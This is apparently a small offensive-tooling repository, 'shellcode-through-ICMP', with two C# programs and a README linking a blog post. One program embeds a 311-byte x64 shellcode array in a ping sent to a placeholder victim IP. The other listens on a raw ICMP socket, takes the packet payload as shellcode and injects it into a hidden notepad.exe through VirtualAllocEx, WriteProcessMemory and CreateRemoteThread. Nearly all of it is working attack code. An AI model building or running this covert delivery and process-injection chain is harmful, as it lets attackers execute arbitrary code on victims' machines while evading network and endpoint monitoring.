├── README.md
├── pingInjection.cs
└── shellcodeInjector.cs


/README.md:
--------------------------------------------------------------------------------
1 | # shellcode-through-ICMP
2 | https://blog.romanrii.com/using-icmp-to-deliver-shellcode
3 | 


--------------------------------------------------------------------------------
/pingInjection.cs:
--------------------------------------------------------------------------------
 1 | using System;
 2 | using System.Net;
 3 | using System.Net.Sockets;
 4 | using System.Runtime.InteropServices;
 5 | using System.Collections;
 6 | using System.IO;
 7 | using System.Diagnostics;
 8 | 
 9 | namespace PingInjection
10 | {
11 |     class Program
12 |     {
13 |         [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
14 |         static extern IntPtr OpenProcess(uint processAccess, bool bInheritHandle, int processID);
15 |         [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
16 |         static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr IpAddress, uint dwSize, uint flAllocationType, uint flProtect);
17 |         [DllImport("kernel32.dll")]
18 |         static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, Int32 nSize, out IntPtr lpNumberOfBytesWritten);
19 |         [DllImport("kernel32.dll")]
20 |         static extern IntPtr CreateRemoteThread(IntPtr hProcess, IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
21 | 
22 |         public static void shellcodeInjection(byte[] shellcode)
23 |         {
24 |             Process proc = new Process();
25 | 
26 |             proc.StartInfo.FileName = "C:\\WINDOWS\\SYSTEM32\\NOTEPAD.EXE";
27 |             proc.StartInfo.WindowStyle = ProcessWindowStyle.Hidden;
28 |             proc.Start();
29 |             int notepadPID = proc.Id;
30 |             IntPtr hProcess = OpenProcess(0x001F0FFF, false, notepadPID);
31 |             IntPtr addr = VirtualAllocEx(hProcess, IntPtr.Zero, 0x1000, 0x3000, 0x40);
32 |             byte[] buf = shellcode;
33 |             IntPtr outSize;
34 |             WriteProcessMemory(hProcess, addr, buf, buf.Length, out outSize);
35 |             IntPtr hThread = CreateRemoteThread(hProcess, IntPtr.Zero, 0, addr, IntPtr.Zero, 0, IntPtr.Zero);
36 |         }
37 | 
38 |         public static byte[] getShellcode()
39 |         {
40 |             Socket icmpListener = new Socket(AddressFamily.InterNetwork, SocketType.Raw, ProtocolType.Icmp);
41 |             icmpListener.Bind(new IPEndPoint(IPAddress.Parse("192.168.0.15"), 0));
42 |             icmpListener.IOControl(IOControlCode.ReceiveAll, new byte[] { 1, 0, 0, 0 }, new byte[] { 1, 0, 0, 0 });
43 |             byte[] buffer = new byte[4096];
44 |             EndPoint remoteEndPoint = new IPEndPoint(IPAddress.Any, 0);
45 |             byte[] shellcode = new byte[4068];
46 | 
47 |             var bytesRead = icmpListener.ReceiveFrom(buffer, ref remoteEndPoint);
48 |             System.Buffer.BlockCopy(buffer, 28, shellcode, 0, 4068);
49 |             return shellcode;
50 |         }
51 | 
52 | 
53 |         static void Main(string[] args)
54 |         {
55 |             byte[] shellcode = getShellcode();
56 |             shellcodeInjection(shellcode);
57 |         }
58 |     }
59 | }
60 | 


--------------------------------------------------------------------------------
/shellcodeInjector.cs:
--------------------------------------------------------------------------------
 1 | using System.Net.NetworkInformation;
 2 | 
 3 | namespace shellcodeInjector
 4 | {
 5 |     class Program
 6 |     {
 7 |        
 8 |         
 9 |         public static void sendShellcode()
10 |         {
11 |             Ping pingSender = new Ping();
12 |             int timeout = 10000;
13 |             byte[] buf = new byte[311] {0xfc,0x48,0x81,0xe4,0xf0,0xff,0xff,0xff,0xe8,0xd0,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x3e,0x48,0x8b,0x52,0x18,0x3e,0x48,0x8b,0x52,0x20,0x3e,0x48,0x8b,0x72,0x50,0x3e,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x3e,0x48,0x8b,0x52,0x20,0x3e,0x8b,0x42,0x3c,0x48,0x01,0xd0,0x3e,0x8b,0x80,0x88,0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x6f,0x48,0x01,0xd0,0x50,0x3e,0x8b,0x48,0x18,0x3e,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x5c,0x48,0xff,0xc9,0x3e,0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0x38,0xe0,0x75,0xf1,0x3e,0x4c,0x03,0x4c,0x24,0x08,0x45,0x39,0xd1,0x75,0xd6,0x58,0x3e,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0,0x66,0x3e,0x41,0x8b,0x0c,0x48,0x3e,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x3e,0x41,0x8b,0x04,0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x3e,0x48,0x8b,0x12,0xe9,0x49,0xff,0xff,0xff,0x5d,0x49,0xc7,0xc1,0x00,0x00,0x00,0x00,0x3e,0x48,0x8d,0x95,0xfe,0x00,0x00,0x00,0x3e,0x4c,0x8d,0x85,0x0d,0x01,0x00,0x00,0x48,0x31,0xc9,0x41,0xba,0x45,0x83,0x56,0x07,0xff,0xd5,0x48,0x31,0xc9,0x41,0xba,0xf0,0xb5,0xa2,0x56,0xff,0xd5,0x50,0x69,0x6e,0x67,0x20,0x49,0x6e,0x6a,0x65,0x63,0x74,0x69,0x6f,0x6e,0x00,0x53,0x68,0x65,0x6c,0x6c,0x63,0x6f,0x64,0x65,0x20,0x49,0x6e,0x6a,0x65,0x63,0x74,0x69,0x6f,0x6e,0x20,0x76,0x69,0x61,0x20,0x50,0x49,0x4e,0x47,0x00 };
14 | 
15 | 
16 |             PingOptions options = new PingOptions(64, true);
17 |             pingSender.Send("VictimPrivIPHere", timeout, buf, options);
18 |         }
19 | 
20 | 
21 |         static void Main(string[] args)
22 |         {
23 |             sendShellcode();
24 |         }
25 |     }
26 | }
27 | 


--------------------------------------------------------------------------------